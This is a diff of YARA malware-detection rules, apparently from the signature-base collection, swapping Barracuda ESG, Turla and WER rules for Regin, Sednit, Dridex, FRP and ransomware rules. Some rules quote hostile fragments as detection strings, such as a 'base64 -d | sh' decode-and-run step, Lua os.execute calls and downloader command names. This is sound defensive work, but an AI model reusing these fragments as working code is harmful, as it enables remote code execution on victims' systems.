+		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
+		$s15 = "KeRemoveDeviceQueue" fullword ascii
+		$s16 = "IofCompleteRequest" fullword ascii
+		$s17 = "KeInitializeSpinLock" fullword ascii
+		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
+		$s19 = "IoCreateDevice" fullword ascii
+		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 40KB and filesize > 30KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Hunting_LUA_SEASIDE_1 : FILE
+rule SIGNATURE_BASE_Regin_Sample_Set_1 : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SEASIDE samples."
-		author = "Mandiant"
-		id = "86eaff7b-4ca0-53cd-8886-da66a36c778f"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L136-L152"
+		description = "Detects Regin Backdoor sample"
+		author = "@MalwrSignatures"
+		id = "b0f24a0b-10e7-5549-a300-516df8644cb0"
+		date = "2014-11-27"
+		modified = "2023-01-06"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L266-L296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cd2813f0260d63ad5adf0446253c2172"
-		logic_hash = "82b61325a78bf8ab09d426cfadceb614a256dfcafb2e1f75595de63593ed2574"
-		score = 70
+		logic_hash = "7402f409e7dd3180d8e6fe017af19d0a1d0dd86f85279191db1bc8f6c94951ac"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
+		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
 
 	strings:
-		$s1 = "function on_helo()"
-		$s2 = "local bindex,eindex = string.find(helo,'.onion')"
-		$s3 = "helosend = 'pd'..' '..helosend"
-		$s4 = "os.execute(helosend)"
+		$hd = { fe ba dc fe }
+		$s0 = "d%ls%ls" fullword wide
+		$s1 = "\\\\?\\UNC" fullword wide
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
+		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
+		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
+		$s6 = "\\\\.\\Global\\%s" fullword wide
+		$s7 = "temp" fullword wide
+		$s8 = "\\\\.\\%s" fullword wide
+		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
+		$s10 = "sscanf" fullword ascii
+		$s11 = "disp.dll" fullword ascii
+		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+		$s13 = "%d.%d.%d.%d%c" fullword ascii
+		$s14 = "imagehlp.dll" fullword ascii
+		$s15 = "%hd %d" fullword ascii
 
 	condition:
-		filesize < 1MB and all of ( $s* )
+		($hd at 0 ) and all of ( $s* ) and filesize < 450KB and filesize > 360KB
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Hunting_Linux_WHIRLPOOL_1 : FILE
+rule SIGNATURE_BASE_Apt_Regin_Legspin : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in WHIRLPOOL samples."
-		author = "Mandiant"
-		id = "a997bd65-c502-53a0-8bb8-62daaa916f0d"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L154-L173"
+		description = "Rule to detect Regin's Legspin module"
+		author = "Kaspersky Lab"
+		id = "2abd3605-d9bf-53f0-8521-ac8dc18d9fce"
+		date = "2015-01-22"
+		date = "2023-01-27"
+		modified = "2024-04-24"
+		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L298-L319"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "177add288b289d43236d2dba33e65956"
-		logic_hash = "d03c0e292b9b97bbf76585fc74208e4263d753807b8e4a445be80d41264d5432"
-		score = 70
+		hash = "29105f46e4d33f66fee346cfd099d1cc"
+		logic_hash = "1b026f475fdbb3c97f33895520844fa4944eb2fffc0883502a6cb79162bbd388"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s1 = "error -1 exit" fullword
-		$s2 = "create socket error: %s(error: %d)\n" fullword
-		$s3 = "connect error: %s(error: %d)\n" fullword
-		$s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}
-		$c1 = "plain_connect" fullword
-		$c2 = "ssl_connect" fullword
-		$c3 = "SSLShell.c" fullword
+		$a1 = "sharepw"
+		$a2 = "reglist"
+		$a3 = "logdump"
+		$a4 = "Name:" wide
+		$a5 = "Phys Avail:"
+		$a6 = "cmd.exe" wide
+		$a7 = "ping.exe" wide
+		$a8 = "millisecs"
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 15MB and ( all of ( $s* ) or all of ( $c* ) )
+		uint16( 0 ) == 0x5A4D and all of ( $a* )
 }
-rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_SKIPJACK_1
+rule SIGNATURE_BASE_Apt_Regin_Hopscotch : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SKIPJACK installation script."
-		author = "Mandiant"
-		id = "0026375c-7f37-5ef9-bd55-5b9fc499e5d2"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L175-L193"
+		description = "Rule to detect Regin's Hopscotch module"
+		author = "Kaspersky Lab"
+		id = "907042ba-8e64-5ca7-9a83-70c28af1ab99"
+		date = "2015-01-22"
+		date = "2023-01-27"
+		modified = "2024-04-24"
+		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L321-L342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e4e86c273a2b67a605f5d4686783e0cc"
-		logic_hash = "8890cd9ab8190f12997e0653e43c89816df03c7bd41842e5ad21b1986819843e"
-		score = 70
+		hash = "6c34031d7a5fc2b091b623981a8ae61c"
+		logic_hash = "33b5fa61aaa802a60f3d42d59eb474222841a8a557b06b23a9e325e922e2cec1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$str1 = "hdr:name() == 'Content-ID'" base64
-		$str2 = "hdr:body() ~= nil" base64
-		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
-		$str4 = "openssl aes-256-cbc" base64
-		$str5 = "mod_content.lua"
-		$str6 = "#!/bin/sh"
+		$a1 = "AuthenticateNetUseIpc"
+		$a2 = "Failed to authenticate to"
+		$a3 = "Failed to disconnect from"
+		$a4 = "%S\\ipc$" wide
+		$a5 = "Not deleting..."
+		$a6 = "CopyServiceToRemoteMachine"
+		$a7 = "DH Exchange failed"
+		$a8 = "ConnectToNamedPipes"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of ( $a* )
 }
-rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SKIPJACK_2
+rule SIGNATURE_BASE_Regin_Related_Malware
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SKIPJACK samples."
-		author = "Mandiant"
-		id = "e1eac294-fe60-5bb2-bae4-0f7bcbe6b1db"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L195-L212"
+		description = "Malware Sample - maybe Regin related"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9377dd52-244f-5289-a2a3-88b6377b2dd2"
+		date = "2015-06-03"
+		modified = "2024-04-24"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L344-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "87847445f9524671022d70f2a812728f"
-		logic_hash = "093e8857c410bd30a076f87ef63d7e1e66f50e3dce75b4add67161782386ee24"
+		hash = "76c355bfeb859a347e38da89e3d30a6ff1f94229"
+		logic_hash = "61ce7a69ab357740158e355455362a4f5fddc67ee60af120733f509e7407216f"
 		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str1 = "hdr:name() == 'Content-ID'"
-		$str2 = "hdr:body() ~= nil"
-		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")"
-		$str4 = "openssl aes-256-cbc"
-		$str5 = "| base64 -d| sh 2>"
+		$s1 = "%c%s%c -p %d -e %d -pv -c \"~~[%x] s; .%c%c%s %s /u %s_%d.dmp; q\"" fullword wide
+		$s0 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
+		$s2 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+		$s3 = "disp.dll" fullword ascii
+		$s4 = "msvcrtd.dll" fullword ascii
+		$s5 = "%d.%d.%d.%d%c" fullword ascii
+		$s6 = "%ls_%08x" fullword wide
+		$s8 = "d%ls%ls" fullword wide
+		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
 
 	condition:
-		all of them
+		$s1 or 3 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SEASPRAY_1
+rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_2 : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SEASPRAY samples."
-		author = "Mandiant"
-		id = "8c744b85-b61e-56d0-8a9e-ae6a954e1b95"
-		date = "2023-06-15"
+		description = "Detects malware from Sednit Delphi Downloader report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6ccd2f21-de44-52fb-912e-d3ecbe57e389"
+		date = "2018-04-24"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L213-L228"
+		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sednit_delphidownloader.yar#L11-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "35cf6faf442d325961935f660e2ab5a0"
-		logic_hash = "856bfb47557b60f69aa1141477d6ce446ea13ebbe899022d7996ceef08bdefbb"
-		score = 70
+		logic_hash = "32acbec3405007afce22b0521785439686338d4d3beb02a1d7b9005e49d87221"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda"
+		hash2 = "657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4"
+		hash3 = "5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182"
+		hash4 = "0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f"
+		hash5 = "72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3"
 
 	strings:
-		$str1 = "string.find(attachment:filename(),'obt075') ~= nil"
-		$str2 = "os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())"
-		$str3 = "os.execute('rverify'..' /tmp/'..attachment:filename())"
+		$s1 = "2D444F574E4C4F41445F53544152542D" ascii
+		$s2 = "55504C4F41445F414E445F455845435554455F46494C45" ascii
+		$s3 = "4D6F7A696C6C612076352E31202857696E646F7773204E5420362E313B2072763A362E302E3129204765636B6F2F32303130303130312046697265666F782F36" ascii
+		$s4 = "41646F62654461696C79557064617465" ascii
+		$s5 = "53595354454D494E464F2026205441534B4C495354" ascii
+		$s6 = "6373727376632E657865" ascii
+		$s7 = "536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E" ascii
+		$s8 = "5C536F6674776172655C4D6963726F736F66745C57696E646F7773204E545C43757272656E7456657273696F6E" ascii
+		$s9 = "5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E" ascii
+		$s0 = "2D444F574E4C4F41445F53544152542D" ascii
+		$fp1 = "<key name=\"profiles\">"
 
 	condition:
-		all of them
+		filesize < 4000KB and 1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_SUSP_WER_Critical_Heapcorruption : FILE
+rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_3 : FILE
 {
 	meta:
-		description = "Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)"
+		description = "Detects malware from Sednit Delphi Downloader report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b1dad5f-cc2c-5d8c-8275-ebb56d079895"
-		date = "2019-10-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1185459425710092288"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_wer_files.yar#L2-L18"
+		id = "2200fbdc-3600-51d4-a273-dc7fd4127c05"
+		date = "2018-04-24"
+		modified = "2023-01-06"
+		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sednit_delphidownloader.yar#L40-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "efa84e375f31ca37b9dd9c7a74251929ac957b9bd530e92f74b8836f56048fea"
-		score = 45
+		logic_hash = "20446692842ec9481f34dd976f6b309515c33159653f9988a59335d2f04e4138"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "ecb835d03060db1ea3496ceca2d79d7c4c6c671c9907e0b0e73bf8d3371fa931"
+		hash2 = "e355a327479dcc4e71a38f70450af02411125c5f101ba262e8df99f9f0fef7b6"
 
 	strings:
-		$a1 = "ReportIdentifier=" wide
-		$a2 = ".Name=Fault Module Name" wide
-		$s1 = "c0000374" wide
+		$ = "Processor Level: " fullword ascii
+		$ = "CONNECTION ERROR" fullword ascii
+		$ = "FILE_EXECUTE_AND_KILL_MYSELF" ascii
+		$ = "-KILL_PROCESS-" ascii
+		$ = "-FILE_EXECUTE-" ascii
+		$ = "-DOWNLOAD_ERROR-" ascii
+		$ = "CMD_EXECUTE" fullword ascii
+		$ = "\\Interface\\Office\\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\\" ascii
+		$ = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
 
 	condition:
-		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_WER_Suspicious_Crash_Directory : FILE
+rule SIGNATURE_BASE_Darkeyev3_Cryptor : FILE
 {
 	meta:
-		description = "Detects a crashed application executed in a suspicious directory"
+		description = "Rule to detect DarkEYEv3 encrypted executables (often malware)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf91e20c-aa35-5b13-86ed-a63e6fb4d1a2"
-		date = "2019-10-18"
+		id = "a2b455e5-3021-5662-b593-c1aeeb34c226"
+		date = "2015-05-24"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1185585050059976705"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_wer_files.yar#L20-L54"
+		reference = "http://darkeyev3.blogspot.fi/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_cryptors.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a197feeafca38ffe33428fa807e2b80e3071ab8960926fc2f328748bda299910"
-		score = 45
-		quality = 60
+		logic_hash = "fdd3a9c22aebb40d000a642f2433adc7dd591784bdf2924edc3effce7bbfa5c2"
+		score = 55
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash0 = "6b854b967397f7de0da2326bdd5d39e710e2bb12"
+		hash1 = "d53149968eca654fc0e803f925e7526fdac2786c"
+		hash2 = "7e3a8940d446c57504d6a7edb6445681cca31c65"
+		hash3 = "d3dd665dd77b02d7024ac16eb0949f4f598299e7"
+		hash4 = "a907a7b74a096f024efe57953c85464e87275ba3"
+		hash5 = "b1c422155f76f992048377ee50c79fe164b22293"
+		hash6 = "29f5322ce5e9147f09e0a86cc23a7c8dc88721b9"
+		hash7 = "a0382d7c12895489cb37efef74c5f666ea750b05"
+		hash8 = "f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61"
 
 	strings:
-		$a1 = "ReportIdentifier=" wide
-		$a2 = ".Name=Fault Module Name" wide
-		$a3 = "AppPath=" wide nocase
-		$l1 = "AppPath=C:\\Windows\\" wide nocase
-		$l2 = "AppPath=C:\\Program" wide nocase
-		$l3 = "AppPath=C:\\Python" wide nocase
-		$l4 = "AppPath=C:\\Users\\" wide nocase
-		$s6 = "AppPath=C:\\Users\\Public\\" nocase wide
-		$s7 = "AppPath=C:\\Users\\Default\\" nocase wide
-		$s8 = /AppPath=C:\\Users\\[^\\]{1,64}\\AppData\\(Local|Roaming)\\[^\\]{1,64}\.exe/ wide nocase
+		$s0 = "\\DarkEYEV3-"
 
 	condition:
-		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of ( $a* ) and ( not 1 of ( $l* ) or 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and $s0
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_1 : FILE
+rule SIGNATURE_BASE_Dridex_Trojan_XML
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1395509a-72f5-56c0-895c-3e9f15829de1"
-		date = "2018-02-22"
+		description = "Dridex Malware in XML Document"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "a8f3406c-f8b0-559f-be12-6b2a7d401ac2"
+		date = "2015-03-08"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L13-L30"
+		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dridex_xml.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "22d799531986c30da19943f1dda305e61a305083478549e93c0ecddeade77b39"
+		logic_hash = "25b6340d782ee20723b2f17f3434a0b27b1561ab22d5a8f859e97e0ac126f651"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b295032919143f5b6b3c87ad22bcf8b55ecc9244aa9f6f88fc28f36f5aa2925e"
+		tags = ""
+		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
+		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
+		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
+		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
+		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
 
 	strings:
-		$s1 = "Pipetp" fullword ascii
-		$s2 = "EStOpnabn" fullword ascii
+		$c_xml = "<?xml version="
+		$c_word = "<?mso-application progid=\"Word.Document\"?>"
+		$c_macro = "w:macrosPresent=\"yes\""
+		$c_binary = "<w:binData w:name="
+		$c_0_chars = "<o:Characters>0</o:Characters>"
+		$c_1_line = "<o:Lines>1</o:Lines>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "169d4237c79549303cca870592278f42" or all of them )
+		all of ( $c* )
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_2 : FILE
+rule SIGNATURE_BASE_HKTL_FRP_Apr20_1
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
+		description = "Detects FRP fast reverse proxy tool often used by threat groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d23d9fe1-26e3-5012-8a88-61ebbc3fbd8f"
-		date = "2018-02-22"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L32-L52"
+		id = "55483832-0e0b-5c28-8be5-dbd14ddb50e3"
+		date = "2020-04-07"
+		modified = "2022-11-03"
+		reference = "https://github.com/fatedier/frp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_frp_proxy.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f1f93d3bc1c4bd55fc7558716a0a1eb7a6c4c2381a4532d37f4e3559f7c809ea"
-		score = 75
+		logic_hash = "21f91fd99aed8b62d804504889c41ca77567fd345cf4ea0ef00161eefa9324a7"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "68c6e9dea81f082601ae5afc41870cea3f71b22bfc19bcfbc61d84786e481cb4"
-		hash2 = "05254971fe3e1ca448844f8cfcfb2b0de27e48abd45ea2a3df897074a419a3f4"
+		tags = ""
+		hash1 = "05537c1c4e29db76a24320fb7cb80b189860389cdb16a9dbeb0c8d30d9b37006"
+		hash2 = "08c685c8febb5385f7548c2a64a27bae7123a937c5af958ebc08a3accb29978d"
 
 	strings:
-		$s1 = ".?AVFileNameParseException@ExecuteFile@@" fullword ascii
-		$s3 = "no_address" fullword wide
-		$s6 = "SRRRQP" fullword ascii
-		$s7 = "QWVPQQ" fullword ascii
+		$x1 = "frp/vendor/github.com/spf13/" ascii
+		$x2 = "github.com/fatedier/frp/vendor/" ascii
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fpg6 = "<?xml"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "cd918073f209c5da7a16b6c125d73746" or all of them )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_3 : FILE
+rule SIGNATURE_BASE_HKTL_FRP_INI_Apr20_1 : FILE
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c83e0a93-3f8d-572d-ac1a-92fef0b3d3f6"
-		date = "2018-02-22"
+		description = "Detects FRP fast reverse proxy tool INI file often used by threat groups"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5c652c9c-715d-5ba5-821a-3e533b1e78c6"
+		date = "2020-04-07"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L54-L77"
+		reference = "Chinese Hacktools OpenDir"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_frp_proxy.yar#L24-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f59c130b500625466da0c8b5bfd84051ee59a3b6261ee3d990d4c355b10672b"
-		score = 75
+		logic_hash = "cc997dc876d7a49292b62a0fb4ff12b34dacacfd8a1b90226d6a9aee303cacdf"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "443cd03b37fca8a5df1bbaa6320649b441ca50d1c1fcc4f5a7b94b95040c73d1"
+		hash1 = "1dabef3c170e4e559c50d603d47fb7f66f6e3da75a65c3435b18175d6e9785bb"
 
 	strings:
-		$x1 = "InstructionerDLL.dll" fullword ascii
-		$s1 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
-		$s2 = "/scripts/m/query.php?id=" fullword wide
-		$s3 = "SELECT * FROM AntiVirusProduct" fullword ascii
-		$s4 = "Microsoft Update" fullword wide
+		$h1 = "[common]" ascii
+		$s1 = "server_addr =" ascii fullword
+		$s2 = "remote_port =" ascii fullword
+		$s3 = "[RemoteDesktop]" ascii fullword
+		$s4 = "local_ip = " ascii
+		$s5 = "type = tcp" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "88488fe0b8bcd6e379dea6433bb5d7d8" or ( pe.exports ( "InstallRoutineW" ) and pe.exports ( "StartRoutine" ) ) or $x1 or 3 of them )
+		uint16( 0 ) == 0x635b and filesize < 1KB and $h1 at 0 and all of them
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_4 : FILE
+rule SIGNATURE_BASE_Trojan_Win32_Adupib_1 : PLATINUM
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1d5c32b3-0316-525c-9386-222917144251"
-		date = "2018-02-22"
+		description = "Adupib SSL Backdoor"
+		author = "Microsoft"
+		id = "fb3b10a4-66d7-50ec-b6a5-b3c5c382ef01"
+		date = "2016-04-12"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L79-L90"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ms_platinum.yara#L101-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4765b912258491f38c03513204d9af8bc62c37df2fe583e371cbbeff6fc12298"
+		hash = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd"
+		logic_hash = "4d93b6a041468b51763d9497acf3d01ee59ac05f1807a6b140c557ef96d26df9"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b362b235539b762734a1833c7e6c366c1b46474f05dc17b3a631b3bff95a5eec"
+		tags = "PLATINUM"
+		unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b"
+		activity_group = "Platinum"
+		version = "1.0"
+
+	strings:
+		$str1 = "POLL_RATE"
+		$str2 = "OP_TIME(end hour)"
+		$str3 = "%d:TCP:*:Enabled"
+		$str4 = "%s[PwFF_cfg%d]"
+		$str5 = "Fake_GetDlgItemTextW: ***value***="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "17b328245e2874a76c2f46f9a92c3bad"
+		$str1 and $str2 and $str3 and $str4 and $str5
 }
-
-rule SIGNATURE_BASE_Turlamosquito_Mal_5 : FILE
+rule SIGNATURE_BASE_Ransom_Lockergoga_Mar19_1 : FILE
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
+		description = "Detects LockerGoga ransomware binaries"
 		author = "Florian Roth (Nextron Systems)"
